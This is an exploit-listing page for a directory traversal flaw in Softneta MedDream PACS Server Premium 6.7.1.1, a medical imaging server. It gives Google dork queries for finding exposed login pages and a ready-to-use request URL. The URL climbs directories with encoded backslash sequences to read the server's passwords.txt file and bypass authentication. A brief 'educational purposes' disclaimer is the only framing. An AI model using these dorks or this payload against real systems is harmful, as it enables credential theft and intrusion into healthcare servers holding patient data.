Exploits / Vulnerability Discovered : 2018-09-07 |
Type : webapps |
Platform : php
This exploit / vulnerability Softneta meddream pacs server premium 6.7.1.1 directory traversal is for educational purposes only and if it is used you will do on your own risk!
[+] Code ...
# Exploit Title: Softneta MedDream PACS Server Premium 6.7.1.1 - Directory Traversal
# Date: 2018-05-23
# Software Link: https://www.softneta.com/products/meddream-pacs-server/downloads.html
# Google Dork: inurl:pacs/login.php, inurl:pacsone/login.php, inurl:pacsone filetype:php home, inurl:pacsone filetype:php login
# Version: MedDream PACS Server Premium 6.7.1.1
# Category: webapps
# Tested on: Windows 7
# Exploit Author: Carlos Avila
# Contact: http://twitter.com/badboy_nt
http://TARGET/Pacs/nocache.php?path=..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c\MedDreamPACS-Premium\passwords.txt (Attack Vector, obtain private information from users and passwords -Bypass Authentication- )
Softneta meddream pacs server premium 6.7.1.1 directory traversal